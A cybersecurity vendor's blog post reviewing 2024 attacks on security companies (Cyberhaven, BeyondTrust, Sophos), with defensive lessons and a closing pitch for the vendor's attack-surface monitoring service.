The Rise of Cybersecurity Companies as Targets [Lessons from 2024]
Table of contents
Why are attackers increasingly focused on exploiting cybersecurity companies as a means to infiltrate ecosystems? Our CISO Todd Carroll explores this new shift in tactics.
When we examine the reality of this trend, there are several lessons to take away. The cases of Cyberhaven, BeyondTrust, and many others exemplify this evolution, and showcase both the vulnerabilities exploited, the targeting of cybersecurity vendors, and the lessons learned.
Lessons from Cyberhaven: The risk of browser extensions
In December 2024, Cyberhaven, a company known for its advanced data loss prevention (DLP) solutions, became the center of a high-profile attack. Threat actors compromised the company’s browser extension by infiltrating developer accounts. The attackers injected malicious code into a legitimate extension, enabling the theft of browser cookies and authentication tokens from over 600,000 users.
This attack highlighted the risks associated with third-party browser extensions. By targeting a company deeply embedded in data security, the attackers gained access to sensitive information which could compromise entire corporate environments. So, what about the main things we can take away from this incident?
Here is a short list:
- The need for robust security practices around third-party tools
- The need for frequent audits
- Understanding how critical multi-factor authentication (MFA) is for developer accounts,
- The need for rigorous monitoring for unusual activity
Lessons from BeyondTrust: The exploitation of privileged access management
BeyondTrust, a U.S. based leader in privileged access management , revealed publicly it was targeted in late December. The PAM leader faced a targeted campaign exploiting vulnerabilities in its privileged access solution. Attackers utilized phishing schemes to gain initial footholds, followed by lateral movement to compromise BeyondTrust’s cloud infrastructure to include exploiting a compromised API key within the remote management software. CVE-2024-12356 is a critical vulnerability affecting BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products. The breach was damaging as it targeted privileged credentials which are the keys to critical systems.
The attackers accessed sensitive client environments using these vendor solutions. This case underlines the importance of hardening PAM solutions against insider threats and external attacks.
Here are some best practices to take away from this incident:
- Implement zero-trust frameworks
- Ensure continuous behavior monitoring
- Oversee that PAM tools are isolated from internet-facing systems.
Lessons from Sophos: Why firewall exploitation can be so dangerous
The final use case involves UK cybersecurity firm Sophos. They were engaged in a complex battle with Chinese hackers targeting their firewall products, in a case dubbed a “five-year long cyber knife fight with Chinese APTs.”
The attackers with links to APT groups, including APT41/Winnti, APT31, and Volt Typhoon exploited vulnerabilities in Sophos’ devices to infiltrate high-profile entities, including military facilities and government agencies. Sophos tracked these hackers, identifying their TTPs and tracing their activities back to a network of researchers associated with the University of Electronic Science and Technology of China and Sichuan Silence Information Technology.
The company released a detailed report, rich with detail about its own and wider industry struggles with vulnerabilities.
Sophos shared some tips to avoid the same risks. Some of these include:
- Closely follow your vendor’s device hardening guide to reduce your attack surface and limit exploitability of zero-day vulnerabilities, paying particular attention to administrative interfaces.
- Enable hotfixes, if supported, and implement processes to monitor your vendors’ communications
- Ensure you are running supported hardware and software for which your vendor is committed to releasing security updates
Why were cybersecurity companies prime targets last year?
The short answer is of course high value data. Cybersecurity companies more often that not manage very sensitive client data, making them lucrative targets for cybercriminals who can extort or sell on this data,
- Trust exploitation: Compromising a trusted security provider amplifies much more the impact, as attackers can leverage the breach to infiltrate downstream clients in a vicious loop
- The growing sophistication of threat actors: Nation-state actors and advanced persistent threats (APTs) are increasingly targeting cybersecurity firms to gain strategic advantages.
Wrapping up: How to reduce risk in 2025 for you and your SOC team
The attacks on Cyberhaven, BeyondTrust, and many others last year really pinpoints how vulnerable even cybersecurity companies can become without the correct defensive strategy in place. Key recommendations include:
- Proactive threat intelligence is crucial: Share and act on threat intelligence in real time- this is not the time to sit with issues. 2024 saw a new sophistry to threats that will likely develop more this year.
- Zero-trust architectures should be on your checklist: Adopt zero-trust principles to limit the blast radius of potential breaches. The above use cases show just how essential they are.
- Enhanced developer security is more important than ever in 2025: Implement MFA, code-signing protocols, and continuous monitoring. Implement this across all development environments.
- Supply Chain resilience is topical for a reason: You should conduct thorough risk assessments of third-party vendors. You should also enforce stringent security controls for integrations.
The lessons of 2024—from browser extension vulnerabilities to supply chain compromises—serve as a call to rethink your strategy.You’ll need to heightened your defenses in the face of such cybercriminal sophistry.
CybelAngel’s approach is proactive at heart. Our EASM solution enables you to identify and address potential security threats before they can be exploited. Your dedicated analyst makes sure that you receive qualified intel to remediate fast. If you want to find out more, get in touch with our expert team.